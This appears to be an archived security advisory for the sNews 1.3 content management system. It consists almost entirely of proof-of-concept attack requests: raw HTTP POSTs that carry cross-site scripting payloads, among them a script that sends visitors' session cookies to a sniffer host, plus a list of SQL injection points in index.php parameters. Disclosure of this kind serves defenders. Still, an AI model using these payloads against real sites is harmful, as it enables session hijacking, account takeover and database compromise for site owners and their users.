AOH :: HP Unsorted S :: B06-3452.HTM

Snews 1.3 xss sql



sNews 1.3 XSS SQL
sNews 1.3 XSS SQL



sNews 1.3
http://snews.solucija.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 88
pojam=&search=search
---
POST http://target.xx:80/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130
text=1&name=1&id=">&commentspage=1&comment=test
---
POST http://target.xx/index.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 130
pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E&name=Ellipsis+Test&id=1&commentspage=1&comment=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C

">"http://sniff.xx/s.gif?"+document.cookie;
-------------
SQL injection
-------------
http://target.xx/index.php?id='[SQL]
http://target.xx/index.php?category='[SQL]
http://target.xx/index.php?PHPSESSID=&id=[SQL]
http://target.xx/index.php?id=1'[SQL]&commentspage=1
-----------------
Ellipsis Security
http://www.ellsec.org 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.